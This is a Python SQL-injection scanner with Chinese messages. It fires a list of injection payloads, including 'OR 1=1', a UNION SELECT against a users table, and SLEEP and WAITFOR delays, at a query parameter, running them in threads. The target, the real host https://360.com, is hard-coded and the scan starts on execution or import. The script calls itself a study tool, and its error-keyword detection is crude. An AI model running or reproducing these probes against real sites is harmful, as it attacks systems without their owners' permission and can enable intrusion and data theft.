import requests
import urllib.parse
from concurrent.futures import ThreadPoolExecutor
import logging
import time
import re
# Configure the root logger at INFO so the request-failure warnings emitted by
# check_sql_injection are shown.
logging.basicConfig(level=logging.INFO)
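def check_sql_injection(url, payload):
    """Send one probe request and report whether the reply looks like a database error.

    The payload is percent-encoded and sent as the value of a query parameter
    named ``param``. The response body is lower-cased and searched for
    error-style markers.

    Args:
        url: Base URL to probe. An existing query string is kept and the probe
            parameter is appended to it.
        payload: Raw test string placed in ``param``.

    Returns:
        A message naming the probed URL when a marker is found, otherwise
        ``None``. ``None`` is also returned when the request itself fails.

    Note:
        A hit is only a hint. The bare word "error" counts as a marker, so any
        page that happens to contain it is reported, and the body is never
        compared with a response fetched without the payload.
    """
    encoded_payload = urllib.parse.quote(payload)

    # Choose the joiner from the URL's current shape: a second "?" would fold
    # the probe into the value of the last existing parameter instead of
    # sending it as its own parameter.
    if "?" not in url:
        joiner = "?"
    elif url.endswith(("?", "&")):
        joiner = ""
    else:
        joiner = "&"
    test_url = f"{url}{joiner}param={encoded_payload}"

    # Plain substrings and regular expressions treated as signs of a database
    # error message in the lower-cased body.
    keyword_markers = ("error", "syntax error", "mysql", "sql server", "database error")
    pattern_markers = (
        r'error:\s\d{3,5}',
        r'(mysql|sql server|oracle|postgresql)\sfunction\s(error|exception)',
    )

    try:
        response = requests.get(test_url, timeout=10)
        lower_text = response.text.lower()
    except requests.exceptions.RequestException as e:
        # Network failures are logged and treated as "nothing found".
        logging.warning("请求%s时出现错误:%s", test_url, e)
        return None

    found = any(marker in lower_text for marker in keyword_markers) or any(
        re.search(pattern, lower_text) for pattern in pattern_markers
    )
    if found:
        return f"可能存在SQL注入漏洞: {test_url}"
    return None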
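def check_url_for_sql_injection(url):
    """Probe one URL with a fixed list of test strings and print the outcome.

    Each test string is submitted to ``check_sql_injection`` on a thread pool
    of up to ten workers. Every non-empty result is printed; if none is
    returned, a single "nothing detected" line is printed instead.

    Args:
        url: Base URL passed unchanged to ``check_sql_injection``.

    Returns:
        None. Results are written to standard output.
    """
    # The entry that carried a ``DROP TABLE`` statement has been removed: a
    # detection pass must not be able to change or destroy data on the system
    # being checked.
    # The two delay-based entries are kept as in the original list, but
    # check_sql_injection only inspects the response body, so they are judged
    # by error text alone and not by how long the reply takes.
    common_payloads = [
        "' OR '1'='1'",
        "1' OR 'a'='a",
        "-1' UNION SELECT * FROM users--",
        "' OR 1=1--",
        "1' AND SLEEP(5)--",
        "1';WAITFOR DELAY '0:0:5'--",
    ]

    with ThreadPoolExecutor(max_workers=10) as executor:
        futures = [
            executor.submit(check_sql_injection, url, payload)
            for payload in common_payloads
        ]
        # Collect in submission order so output order matches the payload list.
        results = [message for message in (f.result() for f in futures) if message]

    if not results:
        print(f"未检测到SQL注入漏洞: {url}")
        return
    for message in results:
        print(message)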
def scan_multiple_urls(urls):
    """Scan each URL in turn and print how long each scan took.

    URLs are handled one after another; only the probes within a single URL
    run on the thread pool inside ``check_url_for_sql_injection``.

    Args:
        urls: Iterable of base URLs to scan.

    Returns:
        None. Progress and timing lines are written to standard output.
    """
    for target in urls:
        print(f"正在扫描{target}")
        began = time.time()
        check_url_for_sql_injection(target)
        elapsed = time.time() - began
        print(f"扫描{target}耗时:{elapsed:.2f}秒")
# The same URL is listed five times, so this runs five back-to-back scans of
# one host rather than scans of five different hosts.
# NOTE(review): the target is hard-coded and there is no
# `if __name__ == "__main__":` guard, so the scan starts as soon as the module
# is executed or imported.
target_urls = ["https://360.com"] * 5
scan_multiple_urls(target_urls)
本程序一次性可以扫描五个网站,但是请注意:它只是一个供学习使用的工具,并不能代替专业的扫描工具。